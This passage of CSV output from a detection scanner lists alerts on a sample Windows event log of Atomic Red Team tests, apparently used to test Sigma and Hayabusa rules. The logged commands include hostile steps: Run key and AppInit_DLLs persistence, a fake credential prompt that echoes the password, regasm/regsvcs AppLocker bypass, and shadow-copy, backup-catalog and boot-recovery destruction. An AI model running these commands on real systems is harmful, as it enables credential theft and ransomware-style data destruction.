powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.075 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d C:\Path\AtomicRedTeam.dll : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "" C:\Path\AtomicRedTeam.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Direct Autorun Keys Modification,,rules/sigma/process_creation/win_susp_direct_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.137 +09:00,MSEDGEWIN10,1,medium,Reg Add RUN Key,,rules/sigma/process_creation/win_reg_add_run_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.161 
+09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.161 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.213 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.240 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys 
Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:06.267 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:19.483 +09:00,MSEDGEWIN10,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:24.234 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,high,PowerShell Writing Startup 
Shortcuts,,rules/sigma/file_event/sysmon_powershell_startup_shortcuts.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:31.287 +09:00,MSEDGEWIN10,11,low,Startup Folder File Write,,rules/sigma/file_event/sysmon_startup_folder_file_write.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RESBED6.tmp"" ""c:\AtomicRedTeam\CSC5779B24A646D409A951966A058ABC4E3.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.681 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U T1121.dll""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:55.699 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:56.033 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""del T1121.dll"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:45:56.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\IEUser\AppData\Local\Temp\RES1BEA.tmp"" ""c:\AtomicRedTeam\CSC8EBD65DB33242A1BAD76494F485AF42.TMP"" : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"" T1121.dll : Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:19.484 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.883 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:46:51.957 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 
23:46:51.957 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,CurrentControlSet Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentcontrolset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:21.972 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.127 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,New DLL Added to AppInit_DLLs Registry Key,,rules/sigma/registry_event/sysmon_new_dll_added_to_appinit_dlls_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 
+09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.147 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.168 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:37.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe delete shadows /all /quiet : Path: C:\Windows\System32\vssadmin.exe 
: User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe delete shadows /all /quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.706 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:40.863 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog -quiet"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.585 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wbadmin.exe delete catalog -quiet : Path: C:\Windows\System32\wbadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""wbadmin.exe delete catalog 
-quiet""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,Shadow Copies Deletion Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.624 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.773 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\wbengine.exe"" : Path: C:\Windows\System32\wbengine.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:45.958 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\vds.exe : Path: C:\Windows\System32\vds.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:46.112 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.816 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy 
ignoreallfailures"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.865 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled no"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:51.997 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bcdedit.exe /set {default} recoveryenabled no : Path: C:\Windows\System32\bcdedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""bcdedit.exe /set {default} recoveryenabled 
no""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,critical,WannaCry Ransomware,,rules/sigma/process_creation/win_malware_wannacry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.010 +09:00,MSEDGEWIN10,1,high,Modification of Boot Configuration,,rules/sigma/process_creation/win_bootconf_mod.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:52.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:57.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""sdelete.exe C:\some\file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:47:57.274 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:48:04.103 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""bitsadmin.exe /transfer /Download /priority Foreground 
